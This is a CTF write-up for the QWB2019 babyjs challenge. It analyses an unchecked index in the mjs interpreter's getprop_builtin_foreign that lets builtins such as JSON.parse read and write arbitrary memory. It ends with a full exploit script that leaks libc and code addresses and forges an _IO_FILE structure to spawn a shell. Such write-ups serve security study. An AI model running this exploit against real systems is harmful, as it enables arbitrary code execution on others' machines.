QWB2019-babyjs

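Preface

This is a challenge I looked at a while ago. I wanted to understand how a JS interpreter works, so I read through the source. Then I moved on to V8, and this write-up was left unfinished …

Reference: Qiangwang Cup (强网杯) babyjs

PoC analysis

Issue: AddressSanitizer: invalid READ at mjs.c:9644

The referenced article gives the PoC from GitHub: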

let s ;
let o = (s);
let z = JSON.parse[333333333%3333333333] === 'xx'

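Running the PoC shows an out-of-bounds access in getprop_builtin_foreign:

Here RSI holds the input index, i.e. 333333333%3333333333, and RAX holds the base address.

Source code analysis

Layout of an mjs object: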

struct mjs_property {
  struct mjs_property *next; /* Linkage in struct mjs_object::properties */
  mjs_val_t name;            /* Property name (a string) */
  mjs_val_t value;           /* Property value */
};

struct mjs_object {
  struct mjs_property *properties;
};

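Properties are chained together in a linked list. Each property stores a name and a value: name is the property's name, and value is the value bound to that property.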
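To make the layout concrete, here is a minimal sketch of the same structure in standard JavaScript (Node.js, not mjs). The helper names makeObject, setProperty and getOwnProperty are hypothetical, and prepending new nodes to the list is an assumption about how mjs inserts properties, not something shown in the source above.

```javascript
// Hypothetical model of struct mjs_object / struct mjs_property.
function makeObject() {
  return { properties: null }; // head of the singly linked list
}

// Overwrite the value if the name exists, otherwise prepend a new node
// (prepending is an assumption made for this sketch).
function setProperty(obj, name, value) {
  for (let p = obj.properties; p !== null; p = p.next) {
    if (p.name === name) {
      p.value = value;
      return;
    }
  }
  obj.properties = { next: obj.properties, name: name, value: value };
}

// Walk the list and return the matching node, or null if there is none.
function getOwnProperty(obj, name) {
  for (let p = obj.properties; p !== null; p = p.next) {
    if (p.name === name) return p;
  }
  return null;
}

const o = makeObject();
setProperty(o, "x", 1);
setProperty(o, "y", 2);
console.log(getOwnProperty(o, "y").value); // 2
console.log(getOwnProperty(o, "z"));       // null
```

Every lookup is a linear scan by name, which matters later: array elements are stored the same way.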

How mjs tells the different kinds of values apart:

/*
 * A tag is made of the sign bit and the 4 lower order bits of byte 6.
 * So in total we have 32 possible tags.
 *
 * Tag (1,0) however cannot hold a zero payload otherwise it's interpreted as an
 * INFINITY; for simplicity we're just not going to use that combination.
 *
 */
#define MAKE_TAG(s, t) \
  ((uint64_t)(s) << 63 | (uint64_t) 0x7ff0 << 48 | (uint64_t)(t) << 48)

#define MJS_TAG_OBJECT MAKE_TAG(1, 1)
#define MJS_TAG_FOREIGN MAKE_TAG(1, 2)
#define MJS_TAG_UNDEFINED MAKE_TAG(1, 3)
#define MJS_TAG_BOOLEAN MAKE_TAG(1, 4)
#define MJS_TAG_NAN MAKE_TAG(1, 5)
#define MJS_TAG_STRING_I MAKE_TAG(1, 6) /* Inlined string len < 5 */
#define MJS_TAG_STRING_5 MAKE_TAG(1, 7) /* Inlined string len 5 */
#define MJS_TAG_STRING_O MAKE_TAG(1, 8) /* Owned string */
#define MJS_TAG_STRING_F MAKE_TAG(1, 9) /* Foreign string */
#define MJS_TAG_STRING_C MAKE_TAG(1, 10) /* String chunk */
#define MJS_TAG_STRING_D MAKE_TAG(1, 11) /* Dictionary string */
#define MJS_TAG_ARRAY MAKE_TAG(1, 12)
#define MJS_TAG_FUNCTION MAKE_TAG(1, 13)
#define MJS_TAG_FUNCTION_FFI MAKE_TAG(1, 14)
#define MJS_TAG_NULL MAKE_TAG(1, 15)

/*'0xffff000000000000' */
#define MJS_TAG_MASK MAKE_TAG(1, 15)

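The tag identifies what kind of value was created. It lives in the upper 16 bits of the 64-bit mjs_val_t, above the pointer payload, and it is set or cleared with bitwise AND/OR operations.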
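The tag arithmetic is easy to check by hand. The sketch below redoes MAKE_TAG in standard JavaScript with BigInt (plain numbers cannot hold 64-bit integers exactly). The helpers tagValue, tagOf and payloadOf are hypothetical names for this illustration, and the payload address is just a sample value.

```javascript
// Mirrors MAKE_TAG(s, t) from the C source, using BigInt for 64-bit values.
function makeTag(s, t) {
  return (BigInt(s) << 63n) | (0x7ff0n << 48n) | (BigInt(t) << 48n);
}

const MJS_TAG_FOREIGN = makeTag(1, 2);
const MJS_TAG_ARRAY = makeTag(1, 12);
const MJS_TAG_MASK = makeTag(1, 15);

// Hypothetical helpers: attach a tag to a 48-bit payload and split it again.
function tagValue(payload, tag) {
  return (payload & ~MJS_TAG_MASK) | tag;
}
function tagOf(v) {
  return v & MJS_TAG_MASK;
}
function payloadOf(v) {
  return v & ~MJS_TAG_MASK;
}

const v = tagValue(0x55555556e800n, MJS_TAG_FOREIGN);
console.log(MJS_TAG_MASK.toString(16));    // ffff000000000000
console.log(MJS_TAG_FOREIGN.toString(16)); // fff2000000000000
console.log(v.toString(16));               // fff255555556e800
console.log(payloadOf(v).toString(16));    // 55555556e800
```

Retagging a value, as mjs_mk_array does later, is the same two steps: clear the tag bits with the mask, then OR in the new tag.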

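Key code analysis

Following the cross-references leads to the place where getprop_builtin_foreign is called:

getprop_builtin is called while interpreting the OP_GET bytecode. Reading the source and debugging shows that OP_GET fetches the value of one property of an object.
obj is the object being loaded from, and key is the property name.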

case OP_GET: {
  mjs_val_t obj = mjs_pop(mjs);
  mjs_val_t key = mjs_pop(mjs);
  mjs_val_t val = MJS_UNDEFINED;

  if (!getprop_builtin(mjs, obj, key, &val)) {
    if (mjs_is_object(obj)) {
      val = mjs_get_v_proto(mjs, obj, key);
    } else {
      mjs_prepend_errorf(mjs, MJS_TYPE_ERROR, "type error");
    }
  }

  mjs_push(mjs, val);

getprop_builtin in turn calls getprop_builtin_foreign:

static int getprop_builtin(struct mjs *mjs, mjs_val_t val, mjs_val_t name,
                           mjs_val_t *res) {
  size_t n;
  char *s = NULL;
  int need_free = 0;
  int handled = 0;

  mjs_err_t err = mjs_to_string(mjs, &name, &s, &n, &need_free);

  if (err == MJS_OK) {
    if (mjs_is_string(val)) {
      handled = getprop_builtin_string(mjs, val, s, n, res);
    } else if (s != NULL && n == 5 && strncmp(s, "apply", n) == 0) {
      *res = mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_apply_);
      handled = 1;
    } else if (mjs_is_array(val)) {
      handled = getprop_builtin_array(mjs, val, s, n, res);
    } else if (mjs_is_foreign(val)) {
      handled = getprop_builtin_foreign(mjs, val, s, n, res);
    }
  }

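getprop_builtin first checks the type of the value passed in. If the lookup is for a built-in property of a string, array, or foreign value (the name apply is also handled here), the value is fetched directly. If none of these match, it returns 0, and the caller falls back to mjs_get_v_proto for an ordinary property load: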

if (mjs_is_object(obj)) {
  val = mjs_get_v_proto(mjs, obj, key);
} else {
  mjs_prepend_errorf(mjs, MJS_TYPE_ERROR, "type error");
}

mjs_get_v_proto is defined as follows:

mjs_val_t mjs_get_v_proto(struct mjs *mjs, mjs_val_t obj, mjs_val_t key) {
  struct mjs_property *p;
  mjs_val_t pn = mjs_mk_string(mjs, MJS_PROTO_PROP_NAME, ~0, 1);
  if ((p = mjs_get_own_property_v(mjs, obj, key)) != NULL) return p->value;
  if ((p = mjs_get_own_property_v(mjs, obj, pn)) == NULL) return MJS_UNDEFINED;
  return mjs_get_v_proto(mjs, p->value, key);
}

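It walks the object's property list and returns the value if the key is found. If it is not found, it looks up the prototype property (MJS_PROTO_PROP_NAME) and repeats the search on the prototype; with no prototype it returns MJS_UNDEFINED.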
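The recursion in mjs_get_v_proto can be sketched in a few lines of standard JavaScript. Objects are modelled as Map instances here, and the value "__p" for the prototype property name is an assumption on my part; the source above only shows the macro MJS_PROTO_PROP_NAME.

```javascript
// Assumption: stands in for MJS_PROTO_PROP_NAME.
const PROTO_PROP_NAME = "__p";

// Own property first, then the prototype chain, else undefined.
function getVProto(obj, key) {
  if (obj.has(key)) return obj.get(key);
  if (!obj.has(PROTO_PROP_NAME)) return undefined;
  return getVProto(obj.get(PROTO_PROP_NAME), key);
}

const base = new Map([["greet", "hello"]]);
const child = new Map([["x", 1], [PROTO_PROP_NAME, base]]);

console.log(getVProto(child, "x"));       // 1
console.log(getVProto(child, "greet"));   // hello
console.log(getVProto(child, "missing")); // undefined
```

The point to take away is that this path only ever compares names, so a numeric key that does not exist simply yields undefined.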

getprop_builtin_foreign is defined as follows:

static int getprop_builtin_foreign(struct mjs *mjs, mjs_val_t val,
                                   const char *name, size_t name_len,
                                   mjs_val_t *res) {
  int isnum = 0;
  int idx = cstr_to_ulong(name, name_len, &isnum);

  if (!isnum) {
    mjs_prepend_errorf(mjs, MJS_TYPE_ERROR, "index must be a number");
  } else {
    uint8_t *ptr = (uint8_t *) mjs_get_ptr(mjs, val);
    *res = mjs_mk_number(mjs, *(ptr + idx));
  }
  return 1;
}

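It converts the name string to an integer and checks whether the string was numeric. If it was, it reads the byte at (pointer held by the foreign value + idx) and returns it as the value. idx is never range-checked, so this is an out-of-bounds access.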
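The missing check is easier to see in a toy model. The sketch below is standard JavaScript, with process memory modelled as one flat Uint8Array and the foreign pointer as an offset into it. The size field and getChecked are hypothetical: as far as the source above shows, a foreign value is just a tagged pointer, so this is an illustration of the idea rather than a proposed patch.

```javascript
// Flat "process memory"; the foreign pointer is an offset into it.
const memory = new Uint8Array(64);
memory.set([0xde, 0xad, 0xbe, 0xef], 16); // bytes the foreign value points at
memory.set([0x41, 0x42, 0x43, 0x44], 40); // unrelated data elsewhere

// size is hypothetical, added only so the checked variant has a bound.
const foreign = { ptr: 16, size: 4 };

// Mirrors getprop_builtin_foreign: only checks that the name is numeric.
function getUnchecked(val, name) {
  if (!/^\d+$/.test(name)) throw new TypeError("index must be a number");
  return memory[val.ptr + Number(name)];
}

// Hypothetical variant that also enforces a bound.
function getChecked(val, name) {
  if (!/^\d+$/.test(name)) throw new TypeError("index must be a number");
  const idx = Number(name);
  if (idx >= val.size) throw new RangeError("index out of range");
  return memory[val.ptr + idx];
}

console.log(getUnchecked(foreign, "0"));  // 222 (0xde, inside the value)
console.log(getUnchecked(foreign, "24")); // 65 (0x41, unrelated memory)
```

In JavaScript an index past the end of the typed array just gives undefined; in C the same read touches whatever happens to be mapped at that address, or crashes as in the ASan report.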

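How builtins are implemented, and the vulnerability

When mjs initializes, it creates a global object, and mjs_set wraps each builtin as a property and adds it to that global object. Whenever a builtin is used, it is looked up in the global object.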

mjs_set(mjs, obj, "load", ~0,
        mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_load));
mjs_set(mjs, obj, "print", ~0,
        mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_print));
...
/*
 * Populate JSON.parse() and JSON.stringify()
 */

v = mjs_mk_object(mjs);
mjs_set(mjs, v, "stringify", ~0,
        mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_json_stringify));
mjs_set(mjs, v, "parse", ~0,
        mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_json_parse));
mjs_set(mjs, obj, "JSON", ~0, v);

mjs_mk_foreign_func is defined as follows:

mjs_val_t mjs_mk_foreign_func(struct mjs *mjs, mjs_func_ptr_t fn) {
  union {
    mjs_func_ptr_t fn;
    void *p;
  } u;
  u.fn = fn;
  (void) mjs;
  return mjs_pointer_to_value(mjs, u.p) | MJS_TAG_FOREIGN;
}

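mjs_mk_foreign_func tags these functions as MJS_TAG_FOREIGN, and this is where the problem comes from.
A builtin function can now be treated like a JS object and used in load or store operations, for example JSON.parse[0x123456]. When OP_GET is interpreted, getprop_builtin_foreign is called and performs the out-of-bounds read. This is not limited to JSON.parse: every builtin function registered this way has the same problem.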

print[0x12356]

This also causes an out-of-bounds read.

For comparison, let's look at how a normal array is created and read.

Array analysis

let a = [1,2,3];
a[0];

This JS code compiles to the following bytecode:

mjs_util.c:228   0  BCODE_HDR   [poc.js] end:59 map_offset: 54
mjs_util.c:134  20  PUSH_STR    [a]
mjs_util.c:233  23  PUSH_SCOPE
mjs_util.c:233  24  CREATE
mjs_util.c:134  25  PUSH_STR    [a]
mjs_util.c:233  28  FIND_SCOPE
mjs_util.c:233  29  PUSH_ARRAY
mjs_util.c:233  30  DUP
mjs_util.c:117  31  PUSH_INT    1
mjs_util.c:233  33  APPEND
mjs_util.c:233  34  DUP
mjs_util.c:117  35  PUSH_INT    2
mjs_util.c:233  37  APPEND
mjs_util.c:233  38  DUP
mjs_util.c:117  39  PUSH_INT    3
mjs_util.c:233  41  APPEND
mjs_util.c:213  42  EXPR        =
mjs_util.c:233  44  DROP
mjs_util.c:134  45  PUSH_STR    [a]
mjs_util.c:233  48  FIND_SCOPE
mjs_util.c:233  49  GET
mjs_util.c:117  50  PUSH_INT    0
mjs_util.c:233  52  SWAP
mjs_util.c:233  53  GET
mjs_util.c:233  54  EXIT

PUSH_ARRAY creates the array:

case OP_PUSH_ARRAY:
  mjs_push(mjs, mjs_mk_array(mjs));
  break;

mjs_mk_array first creates an ordinary object and then retags it as an array with MJS_TAG_ARRAY:

mjs_val_t mjs_mk_array(struct mjs *mjs) {
  mjs_val_t ret = mjs_mk_object(mjs);
  /* change the tag to MJS_TAG_ARRAY */
  ret &= ~MJS_TAG_MASK;
  ret |= MJS_TAG_ARRAY;
  return ret;
}

Elements are added to the array with the APPEND bytecode:

case OP_APPEND: {
  mjs_val_t val = mjs_pop(mjs);
  mjs_val_t arr = mjs_pop(mjs);
  mjs_err_t err = mjs_array_push(mjs, arr, val);
  if (err != MJS_OK) {
    mjs_set_errorf(mjs, MJS_TYPE_ERROR, "append to non-array");
  }
  break;
}

This calls mjs_array_push:

mjs_err_t mjs_array_push(struct mjs *mjs, mjs_val_t arr, mjs_val_t v) {
  return mjs_array_set(mjs, arr, mjs_array_length(mjs, arr), v);
}

mjs_err_t mjs_array_set(struct mjs *mjs, mjs_val_t arr, unsigned long index,
                        mjs_val_t v) {
  mjs_err_t ret = MJS_OK;

  if (mjs_is_object(arr)) {
    char buf[20];
    int n = v_sprintf_s(buf, sizeof(buf), "%lu", index);
    ret = mjs_set(mjs, arr, buf, n, v);
  } else {
    ret = MJS_TYPE_ERROR;
  }

  return ret;
}

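All it does is create a property whose name is the index, as a string, and store the value in that property. buf holds the index in string form; it is passed to mjs_set, which creates the property and adds it to the array.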
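Here is a small sketch of that behaviour in standard JavaScript, with the array's properties modelled as a Map. All helper names are hypothetical, and computing the length as the largest numeric name plus one is my assumption about mjs_array_length, whose body is not shown above.

```javascript
// Hypothetical model: an array is an object whose element names are strings.
function mkArray() {
  return { tag: "array", props: new Map() };
}

// Assumption: length is the largest numeric property name plus one.
function arrayLength(arr) {
  let len = 0;
  for (const name of arr.props.keys()) {
    if (/^\d+$/.test(name)) len = Math.max(len, Number(name) + 1);
  }
  return len;
}

// Mirrors mjs_array_set: format the index as a string and set a property.
function arraySet(arr, index, v) {
  arr.props.set(String(index), v);
}

function arrayPush(arr, v) {
  arraySet(arr, arrayLength(arr), v);
}

// Lookup is by name, so an unknown index is simply "not found".
function arrayGet(arr, index) {
  return arr.props.get(String(index));
}

const a = mkArray();
arrayPush(a, 1);
arrayPush(a, 2);
arrayPush(a, 3);
console.log([...a.props.keys()]);   // [ '0', '1', '2' ]
console.log(arrayGet(a, 0));        // 1
console.log(arrayGet(a, 0x123456)); // undefined
```

Because no pointer arithmetic is involved, a huge index on a real array is harmless, in contrast to the foreign case.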

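Indexing an array goes through OP_GET and ends up in mjs_get_v_proto(mjs, obj, key). The properties are searched by their string names, so there is no out-of-bounds access here.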

case OP_GET: {
  mjs_val_t obj = mjs_pop(mjs);
  mjs_val_t key = mjs_pop(mjs);
  mjs_val_t val = MJS_UNDEFINED;

  if (!getprop_builtin(mjs, obj, key, &val)) {
    if (mjs_is_object(obj)) {
      val = mjs_get_v_proto(mjs, obj, key);

PoC bytecode analysis

JSON.parse[0x123456];

The corresponding bytecode is:

mjs_util.c:228   0  BCODE_HDR   [poc.js] end:44 map_offset: 43
mjs_util.c:134  20  PUSH_STR    [JSON]
mjs_util.c:233  26  FIND_SCOPE
mjs_util.c:233  27  GET
mjs_util.c:134  28  PUSH_STR    [parse]
mjs_util.c:233  35  SWAP
mjs_util.c:233  36  GET
mjs_util.c:117  37  PUSH_INT    1193046
mjs_util.c:233  41  SWAP
mjs_util.c:233  42  GET

These steps fetch the address of the parse builtin (mjs_op_json_parse):

mjs_util.c:134  28  PUSH_STR    [parse]
mjs_util.c:233  35  SWAP
mjs_util.c:233  36  GET

Then 0x123456 (1193046 in the listing) is used as the index for the out-of-bounds access.
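To follow the stack through those nine instructions, here is a toy interpreter in standard JavaScript. It only models the opcodes that appear in the PoC listing. The behaviour of FIND_SCOPE (leave the name on the stack and push the scope that holds it) is an assumption inferred from the listing and from the pop order in OP_GET, and the trace format is made up for this illustration.

```javascript
// Stand-ins for the global scope and the foreign-tagged builtin.
const parseBuiltin = { kind: "foreign", name: "mjs_op_json_parse" };
const globalScope = new Map([["JSON", new Map([["parse", parseBuiltin]])]]);

function run(program) {
  const stack = [];
  const trace = []; // what getprop_builtin_foreign would be asked to read
  for (const [op, arg] of program) {
    switch (op) {
      case "PUSH_STR":
      case "PUSH_INT":
        stack.push(arg);
        break;
      case "FIND_SCOPE":
        // Assumption: the name stays on the stack, the scope goes on top.
        stack.push(globalScope);
        break;
      case "SWAP": {
        const top = stack.pop();
        const below = stack.pop();
        stack.push(top, below);
        break;
      }
      case "GET": {
        const obj = stack.pop(); // popped first, as in OP_GET
        const key = stack.pop();
        if (obj instanceof Map) {
          stack.push(obj.get(key)); // ordinary lookup by name
        } else {
          trace.push({ base: obj.name, index: key });
          stack.push(0);
        }
        break;
      }
      default:
        throw new Error("unsupported opcode " + op);
    }
  }
  return trace;
}

const program = [
  ["PUSH_STR", "JSON"], ["FIND_SCOPE"], ["GET"],
  ["PUSH_STR", "parse"], ["SWAP"], ["GET"],
  ["PUSH_INT", 1193046], ["SWAP"], ["GET"],
];
console.log(run(program)); // [ { base: 'mjs_op_json_parse', index: 1193046 } ]
```

The first two GETs are name lookups on real objects; only the third one receives a foreign value as obj, and that is the one that turns the integer into a raw offset.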

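Exploitation approach

Read GOT entries at known offsets to recover the libc base address, and read init_array to recover the text (code) base address.

Finally, get a shell by forging an _IO_FILE structure. The details are in the referenced article.

Full exploit: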

// Read 8 bytes through the out-of-bounds index and combine them,
// least significant byte first.
function read(offset) {
  let a = [];
  for (let i = 0; i < 8; i++) {
    a[i] = JSON.parse[offset + i];
  }
  let res = 0;
  for (let i = 0; i < 8; i++) {
    res += a[i] << (8 * i);
  }
  return res;
}
// Write an 8-byte value one byte at a time.
function write(offset, target) {
  for (let i = 0; i < 8; i++) {
    JSON.parse[offset + i] = (target >> 8 * i) & 0xff;
  }
}

let start_addr = 0x55555556e800 - 0x555555554000;
let got_addr = 0x00000000022CDF0;
let free_got = 0x00000000022CE08;

// Leak free's address from its GOT entry to locate libc.
let free_addr = read(free_got - start_addr);
let libc_base = free_addr - 0x844f0;
// Leak the text base (per the text above, from init_array).
let code_base = read(0x00000000022CAA8 - start_addr) - 0x000000000001D40;
let system_addr = libc_base + 0x45390;
let bin_sh_addr = libc_base + 0x18cd57;

let cs_log_file = 0x00000000022D228;

let bss_addr = 0x00000000022D218 + 0x100;

let _IO_str_jumps = 0x3c37a0 + libc_base;

// Build the fake _IO_FILE structure in .bss.
let fake_file = [
  0xfbad1800, 0, 0, 0, 1, 2, 0, bin_sh_addr,
];
for (let i = 0; i < fake_file.length; i++) {
  write(bss_addr - start_addr + i * 8, fake_file[i]);
}
write(bss_addr - start_addr + 0x88, 0x7ffff78c6780 - 0x7ffff7500000 + libc_base);
fake_file = [_IO_str_jumps - 8, 0, system_addr];
for (let i = 0; i < fake_file.length; i++) {
  write(bss_addr - start_addr + 0xd8 + i * 8, fake_file[i]);
}
write(cs_log_file - start_addr, bss_addr + code_base);
write(0x00000000022D220 - start_addr, 999);
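The read and write helpers in the exploit assemble 64-bit values one byte at a time in little-endian order, and every offset is taken relative to start_addr. The sketch below replays that arithmetic in standard JavaScript against a fake byte array. The names read64, write64, readByte and writeByte are hypothetical. BigInt is used because the << operator in standard JavaScript works on 32-bit integers; how mjs itself evaluates shifts is not covered by the source quoted in this post. Reading start_addr as the offset of the foreign pointer from the image base is my interpretation of the constants.

```javascript
// Fake memory standing in for the byte-level primitive JSON.parse[i].
const mem = new Uint8Array(32);
function readByte(off) {
  return mem[off];
}
function writeByte(off, b) {
  mem[off] = b;
}

// Combine 8 bytes, least significant first.
function read64(offset) {
  let res = 0n;
  for (let i = 0; i < 8; i++) {
    res |= BigInt(readByte(offset + i)) << BigInt(8 * i);
  }
  return res;
}

// Split a 64-bit value into 8 bytes, least significant first.
function write64(offset, target) {
  for (let i = 0; i < 8; i++) {
    writeByte(offset + i, Number((target >> BigInt(8 * i)) & 0xffn));
  }
}

write64(8, 0x7ffff7a914f0n);   // sample value, not taken from the exploit
console.log(mem[8].toString(16));      // f0
console.log(read64(8).toString(16));   // 7ffff7a914f0

// Offsets from the exploit: the index passed to JSON.parse[...] is the
// target offset minus start_addr.
const startAddr = 0x55555556e800n - 0x555555554000n;
const freeGot = 0x22ce08n;
console.log(startAddr.toString(16));             // 1a800
console.log((freeGot - startAddr).toString(16)); // 212608
```

So the first leak in the exploit, read(free_got-start_addr), reads eight bytes starting 0x212608 past the builtin's address.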